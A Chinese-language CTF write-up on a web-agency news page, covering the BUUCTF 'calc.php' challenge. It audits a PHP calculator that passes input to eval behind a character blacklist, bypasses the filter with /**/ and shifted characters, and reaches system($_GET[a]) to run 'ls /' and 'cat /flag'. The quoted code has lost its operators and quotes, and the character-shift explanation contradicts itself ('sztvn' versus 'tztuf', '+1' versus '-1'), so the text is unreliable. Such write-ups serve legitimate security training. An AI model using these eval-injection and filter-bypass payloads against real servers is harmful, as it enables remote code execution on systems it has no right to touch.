ARTICLE DETAIL

资讯详情

深耕网站建设与运营推广的一线实战洞察。

CTF WEB安全:calc.php代码审计与WAF绕过实战

CTF WEB安全:calc.php代码审计与WAF绕过实战 1. BUUCTF WEB赛题解析calc.php挑战实录最近在BUUCTF平台上刷题时遇到一道名为calc.php的WEB题目这道题综合考察了代码审计、WAF绕过和字符编码技巧。作为CTF老手我记录下完整的解题思路和踩坑过程特别适合刚入门WEB安全的新手参考。这道题的核心是一个简易计算器页面表面功能是对用户输入的数字表达式进行运算。但通过查看源码发现服务端用chr()函数处理了部分输入字符同时部署了基础的WAF防护。这种题型在CTF中非常典型——表面简单的功能背后往往藏着精心设计的漏洞点。2. 初始代码审计与功能测试2.1 页面基础功能分析访问题目提供的URL后看到一个极简的计算器界面输入框提交按钮。测试基本运算输入11返回2输入2*3返回6输入10/2返回5看似正常的四则运算功能但查看网页源码发现关键提示?php error_reporting(0); if(!isset($_GET[num])){ show_source(__FILE__); }else{ $str $_GET[num]; $blacklist [ , \t, \r, \n,\, , , \[, \],\$,\\,\^]; foreach ($blacklist as $blackitem) { if (preg_match(/ . $blackitem . /m, $str)) { die(what are you want to do?); } } $str str_replace(chr(32), chr(32)1, $str); $str str_replace(chr(33), chr(33)1, $str); // ...省略类似多行... echo result: .eval(return $str;); } ?2.2 关键安全限制解析代码中设置了多重防护黑名单过滤禁止空格、引号、反引号等特殊字符字符替换对ASCII 32-126的可见字符都做了1替换直接eval执行用户输入最终进入eval函数这提示我们需要绕过黑名单字符限制处理字符替换的影响构造无引号的RCE payload3. WAF绕过技术实战3.1 黑名单字符替代方案由于空格被过滤测试发现可用/**/替代?num1/**//**/1 // 返回2引号被禁但PHP中字符串可用以下方式表示$_GET[x]形式获取参数使用十六进制或八进制编码通过数学运算生成ASCII字符3.2 字符替换逆向处理代码中对每个字符做了1操作例如$str str_replace(chr(32), chr(33), $str); // 空格→!因此我们需要提交的payload中每个字符需要先-1。例如想传入空格(32)实际应提交!(33)。3.3 无引号RCE构造最终目标是执行系统命令但无法使用引号。可通过以下方式使用反引号执行命令但被过滤使用system等函数直接执行字符串通过数学运算构造字符经过测试发现可用$_GET[a]方式传递命令。完整利用链创建额外参数?als在num参数中用system($_GET[a])执行但需要处理字符替换system需要写作sztvn每个字母1$_GET[a]需要写作%24_GET%5Ba%5DURL编码避免特殊字符4. 完整漏洞利用过程4.1 分步payload构造确定要执行的命令ls /列出根目录转换字符s→ty→zs→tt→ue→fm→n空格→!$_GET→%24_GET[a]→%5Ba%5D最终URL?numtztuf(!%24_GET%5Ba%5D)als!/服务端处理流程将tztuf转换回system将!转换回空格执行system($_GET[a])4.2 实际测试结果提交payload后返回result: bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var确认RCE成功发现flag文件通常在根目录下继续读取?numtztuf(!%24_GET%5Ba%5D)acat!/flag成功获取flag内容。5. 防御方案与CTF经验5.1 漏洞根源分析本题漏洞主要由于直接eval用户输入字符替换可被逆向黑名单过滤不彻底5.2 安全开发建议避免直接eval不可信输入使用白名单而非黑名单关键操作使用参数化而非字符串拼接5.3 CTF解题技巧遇到字符替换时先确定替换规则黑名单过滤尝试不同编码形式URL/HTML/Unicode替代字符如/**/代替空格无引号RCE常用$_GET/POST参数数学运算生成字符已有变量拼接这道calc.php题目虽然代码量不大但完整覆盖了WEB安全的多个核心知识点。在实际渗透测试中这种基于字符操作和过滤绕过的场景非常常见。通过这类CTF题目的训练能有效提升真实环境下的漏洞发现和利用能力。
返回列表